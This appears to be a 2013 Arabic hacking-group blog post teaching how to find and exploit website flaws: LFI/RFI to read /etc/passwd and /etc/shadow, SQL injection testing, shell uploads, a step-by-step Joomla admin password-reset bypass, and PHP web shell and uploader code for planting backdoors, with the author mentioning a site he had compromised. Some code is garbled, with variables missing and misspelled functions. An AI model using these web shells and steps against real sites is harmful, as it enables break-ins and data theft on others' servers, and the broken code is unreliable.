حاسوبي اليوم درس اكتشاف الثغرات ~ قراصنة الجزائر
لا تنسو صلاتكم ان الصلات كانت على الموؤمنين كتابا موقوتا

الأربعاء، 17 أبريل 2013

اليوم درس اكتشاف الثغرات





السلام عليكم و رحمة الله و بركاته

1---اليوم جبتلكم موقع لفحص LFI & RFI & Path Disclosure

لكن قبل ما أحط الرابط خلونا نعرف واش يعني LFI & RFI & Path Disclosure

********************************

كلمة (RFI ) هي اختصار لكلمة (Remote File Include) وكلمة (LFI )

هي اختصار لكلمة (Local File Include

كلا الثغرتين تدرج تحت مسمى File Include

ثغرة الـ RFI هي ثغره في سكربت الموقع تنتج من خلال

خطأ في كتابة لغة السكريبت بالشكل الصحيح

حيث من خلالها نستطيع استدعاء ملفات

من خارج السيرفر وتمكننا من ربط شيل بالملف المصاب..




ثغرة الـ
LFI مثل الـ RFI لكن استغلالها غير
نستطيع من خلالها قرائة الملفات المحليه على السيرفر مثل ملف




كود PHP:
/etc/passwd  &/etc/shadow 

طبعآ تتم القرائة حسب مسار الملف


اما ثغرة
Path Disclosure ليس لها استغلال
وظيفتها تعرض لك مسار الموقع المصاب على السيرفر

يعني تعرف من خلالها على سبيل المثال اسم اليوزر.

ربط فحص المواقع بمعرفة ان كانت مصابة بهذه الثغرة http://wasteez.com/

2---ثغرة  SQL

من اجل ان نعرف اذا الموقع مصاب بثغرة sql injection اي بثغرة الحقن لازم نخرب الإستعلام

كيف يعني نخرب الإستعلام
شوف مثلا ، عندي هاذا الامر لإستخراج اسماء المواقع


كود PHP:
select sites from aljyyosh.com where id 
طيب كيف بخرب الإستعلام ، الطريقه بسيطه بدنا نِدّخِل شيء على الإستعلام
رح نكتب الإشاره اللي بين القوسين (') في اخر الرابط ، اي عند الرقم نضيف اشارة '
شوف كيف يصير الإستعلام
رح يظهر لك خطأ يبدأ ب
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
او خطأ يوجد فيه عبارة
syntax error

3- ثغرة
 ثغره رائعه وجميله تحصلنا الباك اب تاع الموقع بسهوله وتخلينا نقتحم الموقع بالراحه



وفي كثير مواقع شوب مصابه بالثغره


الفدييو http://www.youtube.com/watch?feature=player_embedded&v=7lgxtx1VGsY



4- ثغرةupload shel   مثل هذا الاختراق ينجح غالبا بالتسجيل باحد المواقع

والذهاب الى الملف الشخصي ورفع شل او اي مكان يقبل رفع نحاول منه رفع الشل



وكانت في السابق معظم مراكز التحميل مصابه بها


الا انه الان اصبح من النادر الوصول الى سكربت تحميل مصاب بمثل هذه الثغره


   

 الشرح http://www.youtube.com/watch?feature=player_embedded&v=ESlh3z38L0w



5-- شرح ثغرة remote password change Vulnerability


اقتباس






Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m

2. Write into field "token" char and Click OK.

3. Write new Password for admin

4. Go to url : target.com/administrator/

5. Login admin with new Password



http://www.youtube.com/watch?feature=player_embedded&v=GoyrQ99dMJ0



6--
الدوال المسببه للثغره


اقتباس






system
exec
shell_exec
popen
proc_open
passthru




الثغره لها مشاكل من السهل حمايه السيرفر منها
ومش ع كل السيرفرات بتنجح باستغلالها عليها
والسبب هو
php confguration
الخاص بالسيرفر حيث يمكن لصاحب السيرفر حمايه سيرفره من خلال هذا الملف

رح نشرح كمان كود تلغيم سكربت فيها

اقتباس

المشاركة الأصلية كتبت بواسطة ViRuS_HaCkErS






<?php
echo '<form action="cmd.php" method="post">
<input type="text" name="cmd">
<input type="submit">';
$cmd=$_POST['cmd'];
echo system($cmd);
?>



دا كود التلغيم برمجه فايروس هكر للثغره وينجح ع كل السيرفرات ما وفقت بالدرس اشرح ع السيرفر
الي ما رضيت فيه الثغره تشتشغل لانه الموقع جنسي الي مخترقه وبشرح عليه
والموقع محظور وهذا ما ساعدني ببقى اشرحه فيما بعد

الفيدو للاستغلالhttp://www.youtube.com/watch?feature=player_embedded&v=bdGjddgJp6M




7--   ملف الي فيه الثغره كان الاندكس يا حلوتك

هذا كود الثغره نقلته لكم بشكل نوعا ما مختصر (قربت بين المتغيرات حتى ما نضيع زي ما ضاع المبرمج )



كود PHP:
<?php
$msg 
$_GET['site']; $ip getenv('REMOTE_ADDR'); $error fopen('wp.php','a'); fwrite($error,'<br />'.$site.'<br />'.$ip.'<br />'); fclose($error); ?>
زي ما ملاحظين عنا المتغير site هو المصاب بالثغره وعنا الملف wp.php هو الي ورط بالكود الخبيث الي رح نزرعه لاحظ انه ملف php وهذا يمكنا من زرع كود php لو كان ملف ثاني مثلا html ما رح ينفع
ازرع كود شل او كود ثغره من ثغرات php

نتابع

الان عنا كود ابلود جربت ازرعه ما نفع معي خلينا نشوفه --- بالفيديو

كود PHP:

<?php // By ViRuS_HaCkErS $fname $_FILES['file']['name']; // name . type $ftemp $_FILES['file']['tmp_name']; // temp file root folder $ftype $_FILES['file']['type']; // file type / type $up "/"


if(
$_POST['do'] == 'upload') {
  
move_uploaded_file($ftemp$up.$fname);
}




echo 
'
<form action="test.php" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="do" value="upload" />
</form>
'
; ?>

هنا الكود ما اشغل لانه ما يجي سطر واحد والله اعلم يعني عمل لنا مشاكل بالاسطر بالتالي صارت متاعب


بالضبت ايش الي منعه من العمل من ناحيه علميه ما بعرف بس مجرد تخمينات ما يهمنا 

كثير الطرق المهم نصل للهدف ------


الكود الثاني الي زرعه هو --- بالفيديو

اقتباس






<?php systeam ($hack);?>


وهذا درس مرق معانا سابقا ايش هاي الثغره الحلوه وكيف نستغلها وهي ثغره بقمه الرووعه

يلا هيك ما ضل شيء 


 http://www.youtube.com/watch?feature=player_embedded&v=wC_f3HyLqcI

0 التعليقات:

إرسال تعليق